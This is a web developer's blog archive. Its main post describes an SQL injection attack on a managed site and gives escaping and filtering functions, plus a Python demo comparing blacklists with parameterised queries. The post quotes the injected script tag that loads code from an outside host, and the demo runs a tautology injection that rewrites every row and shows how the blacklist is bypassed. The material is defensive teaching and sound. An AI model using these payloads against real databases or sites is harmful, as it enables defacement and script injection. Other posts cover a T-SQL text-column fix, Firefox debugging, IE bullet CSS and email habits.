Archive for the “General WebDev” Category

The other day a Russian hacker made a mess of a site I manage. (I didn’t build the site, and I like to think that if I had, the attack would have been thwarted.) Anyway, the hacker used a method called SQL Injection, where they take advantage of one of your submission forms to add extra SQL commands to their input and wreak havoc on your database.

In this particular instance the hacker added a JavaScript call into about every text and varchar field in the entire database (12 tables in all). Here is the offending code that was inserted into the fields:

<script src=http://www.jsportal.ru/page.js></script>

I don’t know what the JavaScript does when loaded, but I am sure it’s not good news. FYI – here is an important tip for cleaning up your database: SQL Replace Function on a Text Field

Anyway, there are certainly other articles on how SQL Injections occur and how to prevent them, but here are a couple of functions that reduce your exposure to SQL Injection if you apply them to any data that site users can submit. Treat them as mitigations rather than the fix: the reliable defence is to keep user data out of the SQL text altogether by using parameterised queries (ADO Command parameters in classic ASP, prepared statements with mysqli or PDO in PHP).

For ASP sites:

This one doubles single quotes, so a quote in user input stays inside the string literal instead of closing it and starting a new SQL command:

<%
' Double each single quote so user input cannot terminate the SQL string literal.
function stripQuotes(strWords)
  stripQuotes = replace(strWords, "'", "''")
end function
%>

And this one removes a blacklist of keywords and characters that might destroy your database. Be aware that a blacklist like this is easy to get around (different case, nested tokens such as "selselectect", alternative syntax) and it also mangles legitimate input (the word "selection" comes out as "ion"), so it is defence in depth at best:

<%
function killChars(strWords)
  dim badChars
  dim newChars
  dim i

  ' Blacklist from the original article; see the caveats above.
  badChars = array("select", "drop", ";", "--", "insert", "delete", "xp_")
  newChars = strWords

  for i = 0 to uBound(badChars)
    ' vbTextCompare makes the match case-insensitive; VBScript's default
    ' binary compare would let "SELECT" straight through.
    newChars = replace(newChars, badChars(i), "", 1, -1, vbTextCompare)
  next

  killChars = newChars
end function
%>

These aren’t the exact ones I use, but you get the idea. You can find the article where I got these ASP examples from here:

SQL Injection Attacks – Are You Safe?

For the PHP versions:

In PHP the equivalent is a single function, applied to every string before it is concatenated into a query (the escaped value must then be placed inside quotes in the SQL). It needs an open MySQL connection, and the mysql_* extension was removed in PHP 7.0; use mysqli_real_escape_string() or, better, prepared statements with mysqli or PDO:

$strWords = mysql_real_escape_string($strWords); // returns the escaped copy; the original is not modified

This does not strip anything: it prefixes each of these characters in strWords with a backslash so MySQL reads them as literal characters rather than as string delimiters or control characters:

  • \x00
  • \n
  • \r
  • \
  • '
  • "
  • \x1a

You can also use this to make sure inputs you expect to be numbers are actually numbers:

$strNumber = intval($strNumber);
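As an added example (not code from the original post or from the linked article), here is a Python port of the two ASP filters run against an in-memory SQLite database. It shows two inputs that pass killChars() with their meaning intact, an UPDATE built by string concatenation that rewrites every row when the numeric id is not validated (the same end result as the "every text field in the database" incident above), and the parameterised version with int() validation that refuses it. The table, column names and sample rows are constructed for the demo; the injected tag is the one quoted in the post. The last function shows why the cleanup matters: the stored tag is a stored XSS payload, and escaping on output stops it executing even if it is still in the database.

```python
"""Blacklist filters vs parameterised queries, using only the standard library."""
import html
import sqlite3

# Constructed sample payload: the tag the post says was written into every text column.
INJECTED_TAG = '<script src=http://www.jsportal.ru/page.js></script>'

# Blacklist from the page's killChars() function.
BAD_WORDS = ("select", "drop", ";", "--", "insert", "delete", "xp_")


def kill_chars(words: str) -> str:
    """Port of killChars(): delete every blacklisted token (case-sensitive,
    which is what VBScript's Replace does by default)."""
    for bad in BAD_WORDS:
        words = words.replace(bad, "")
    return words


def strip_quotes(words: str) -> str:
    """Port of stripQuotes(): double each single quote so it stays inside the literal."""
    return words.replace("'", "''")


def setup_db() -> sqlite3.Connection:
    """Constructed demo schema: two users with a free-text bio column."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, bio TEXT)")
    conn.executemany("INSERT INTO users (name, bio) VALUES (?, ?)",
                     [("alice", "50 years of staffing"), ("bob", "web developer")])
    return conn


def update_bio_vulnerable(conn: sqlite3.Connection, user_id: str, bio: str) -> int:
    """SQL assembled by concatenation after applying both page filters.
    The string column is protected by the quote doubling, but the numeric id
    is spliced in raw, so an id of "1 OR 1=1" rewrites every row.
    Returns the number of rows changed."""
    sql = ("UPDATE users SET bio = '" + strip_quotes(kill_chars(bio)) +
           "' WHERE id = " + kill_chars(user_id))
    return conn.execute(sql).rowcount


def update_bio_safe(conn: sqlite3.Connection, user_id: str, bio: str) -> int:
    """Parameterised statement: the driver passes bio as data, never as SQL, and
    int() rejects anything that is not a number (the page's intval() idea)."""
    return conn.execute("UPDATE users SET bio = ? WHERE id = ?",
                        (bio, int(user_id))).rowcount


def safe_rejects_bad_id(conn: sqlite3.Connection) -> bool:
    """True if the safe version refuses the tautology id instead of running it."""
    try:
        update_bio_safe(conn, "1 OR 1=1", INJECTED_TAG)
    except ValueError:
        return True
    return False


def bios(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT bio FROM users ORDER BY id")]


def blacklist_bypasses() -> dict:
    """Inputs whose SQL meaning survives kill_chars()."""
    return {
        "case": kill_chars("SELECT name FROM users"),  # upper case is not on the list
        "nesting": kill_chars("selselectect"),         # removing the inner token leaves 'select'
    }


def render_bio(bio: str) -> str:
    """Output encoding: a stored <script> tag is displayed as text, not executed."""
    return "<p>" + html.escape(bio) + "</p>"


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable rows changed:", update_bio_vulnerable(db, "1 OR 1=1", INJECTED_TAG))
    print("bios after attack:", bios(db))
    print("safe version rejects bad id:", safe_rejects_bad_id(setup_db()))
    print("bypasses:", blacklist_bypasses())
    print("rendered:", render_bio(INJECTED_TAG))
```

The vulnerable function changes both rows even though every input went through both filters; the safe function never lets the input reach the SQL parser, so the keyword list becomes irrelevant.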

Comments Off on SQL Injection by jsportal.ru

The other day a creative Russian hacker caused me to do some database clean-up. I won’t tell the whole story; in a nutshell, be sure to protect your sites from SQL Injection. I guess my next post will be some SQL injection prevention methods.

Anyway, I discovered that the usual REPLACE method does not work on text fields, just varchar and similar. And when I did a quick Google search, I found a lot of way too complicated approaches. So here is the simplest way.

First, here is the usual update replace method you might be familiar with:

UPDATE YourTable -- placeholder table name
SET StringtoEdit = REPLACE(StringtoEdit, 'to-be-replaced', 'replace-with')

(So in every row of the column "StringtoEdit", any instance of "to-be-replaced" is replaced with "replace-with".)

But if you try this method on a column of type text (this is SQL Server; DATALENGTH below is T-SQL), you will get this rather vague error:

Argument data type text is invalid for argument 1 of replace function.

So here is the easy solution I found:

UPDATE YourTable -- placeholder table name
SET StringtoEdit = REPLACE(SUBSTRING(StringtoEdit, 1, DATALENGTH(StringtoEdit)), 'to-be-replaced', 'replace-with')
WHERE StringtoEdit LIKE '%to-be-replaced%' -- only touch rows that actually contain the string

The new elements are the SUBSTRING(StringtoEdit, 1, DATALENGTH(StringtoEdit)) wrapper: SUBSTRING accepts a text argument and returns varchar, which REPLACE will take. On SQL Server 2005 and later, CAST(StringtoEdit AS varchar(max)) does the same job without the length juggling, and the text type itself is deprecated in favour of varchar(max). Take a backup before running a mass UPDATE, and run it as a SELECT with the same WHERE clause first to see which rows it will hit. Try it out; it’s way easier than most solutions out there.

1 Comment »

Comments Off on When Flash animation attacks

Just thought I would mention how handy Firefox’s built-in Error Console feature is for debugging. I mostly use this for JavaScript; in fact I can’t even remember using it for anything else.

But in any case, if you run into the same problems I do with JavaScript, this is a handy tool for catching the issue at hand.

To bring up your Error Console just choose Tools > Error Console from the Firefox top menu.

Then go to the page where you suspect your problem and the console will give you clues.

I have also installed Firebug add-on which looks to have a load of potential for more detailed debugging, but I haven’t really spent enough time on it yet to tell you my thoughts. I will eventually.

Comments Off on Firefox’s Error Console handy for quick debugging of JavaScript

Ever had people gripe because the second line of a list item doesn’t align under the bullet correctly? (This is only a problem in IE, by the way – Firefox does the work for you.)

So here is an example of the problem (remember, if you’re not viewing in IE you won’t see anything wrong):

  • Over 50 years of staffing
    industry knowledge

Here is how I fixed it. First the code:

<li>Over 50 years of staffing </li>
<li class="bullet-hidden"><span class="bullet-visible">industry knowledge</span></li>

Then the CSS styles:

.bullet-visible {
visibility:visible;
}

.bullet-hidden {
visibility:hidden;
}

If for some reason you can’t define the style sheets, or don’t want to, you can do it directly in the code as follows:

<li>Over 50 years of staffing </li>
<li style="visibility: hidden;"><span style="visibility:visible;">industry knowledge</span></li>

And abracadabra:

  • Over 50 years of staffing
  • industry knowledge

Comments Off on Lining up wrapped text on bullet lists

I had been stuck using my work’s web-based email interface for the last six months, so when they finally changed servers and I was able to move back to Outlook I was thrilled! It’s just much more organized and I am used to all the handy features, as opposed to web-based sites. In fact, the one I was using wouldn’t even let me search in Firefox, so I had to reopen the site in IE every time I needed to search for an old email – ugh.

Anyway, since I was getting this fresh start in Outlook, I decided that I wanted to try something new, something I had only heard of in fairy tales: keep my Inbox empty!

So I have been at it a month and I am proud to say that I only have 34 items in my Inbox at the moment! Not bad for a guy who gets 50-100 a day (another 25 in my Gmail daily) and who has a history of nearly crashing mail servers with the backlog of emails he has amassed. Put it this way: I have over 9,000 emails in my Gmail!

So how am I doing it? Simply put, I try to attend to every email as it comes in and then diligently delete the email immediately after taking care of whatever it was about, and then several times a day do a sweep through the Inbox, delete what is not needed and flag anything that I still need to complete before deleting.

I had used flags before as a way to sort through the 1,000s of emails in my Inbox to see what important things I had missed. It was pretty useful, but now with so few emails in my Inbox it becomes almost a daily task list and keeps me focused on getting the items all done so I can have the pleasure of deleting them!

I will admit that I did have to create a couple of folders off to the side where I could stash away things I thought I had better keep long term, and so far I haven’t deleted any of my Sent mails or emptied my Deleted Items folder either! I guess I am still a little nervous about losing something I may have needed, but hey, that was not the goal; the goal was to “keep my Inbox empty” and so far so good! In fact, since I started typing this post I deleted another email – 33 more to go!

2 Comments »

Comments Off on Web 2.0 … The Machine Is Us/ing Us